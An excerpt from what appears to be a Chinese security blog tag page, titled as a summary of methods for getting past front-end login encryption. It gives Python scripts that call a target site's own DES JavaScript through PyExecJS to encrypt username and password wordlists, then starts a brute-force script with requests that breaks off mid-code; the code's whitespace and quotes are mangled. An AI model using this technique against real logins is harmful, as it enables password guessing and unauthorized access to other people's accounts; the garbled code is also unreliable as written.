Tag:前端加密

Tag (前端加密)'s result:

突破前端加密方法总结

0x00 执行加密的js文件写脚本生成加密字典 如 https://yyy.xxx.com/assets/des/des.js 对密码(123456)进行了前端加密传输。 这里还需要从页面源代码找到加密方法的参数 pip install PyExecJS 再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name) 加密脚本:生成加密后的用户名和密码 #coding:utf-8 #from selenium import webdriver import execjs def mzDes(s,para): despara = execjs.get(‘phantomjs’).compile(s).call(“strEnc”,para,”csc”,”mz”,”2017″) return despara with open(‘des.js’,’r’) as mzCrypto: s = mzCrypto.read() with open(‘users.txt’,’r’) as users: #des username     with open(‘des_users.txt’,’w’) as f4DesUser:     user = users.readlines()     for u in user:     uname = u.strip()     print uname desUsername = mzDes(s,uname) print desUsername     f4DesUser.write(desUsername+’\n’) with open(‘pwdTop54.txt’,’r’) as pwds: #des password     with open(‘des_pwds.txt’,’w’) as f4DesPwd:     pwd = pwds.readlines()     for p in pwd:     passwd = p.strip()     print passwd     desPassword = mzDes(s,passwd)     print desPassword     f4DesPwd.write(desPassword+’\n’) 这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。 py脚本爆破(单线程): #coding:utf-8 #from selenium import webdriver import execjs import requests import re successCount = 0 def mzDes(s,para): despara = execjs.get().compile(s).call(“strEnc”,para,”csc”,”mz”,”2017″) return despara with open(‘des.js’,’r’) as mzCrypto: s = mzCrypto.read() with open(‘users.txt’,’r’) as users: #des username user = users.readlines() for u in user: with open(‘top50.txt’,’r’) as pwds: #des password     uname = u.strip()……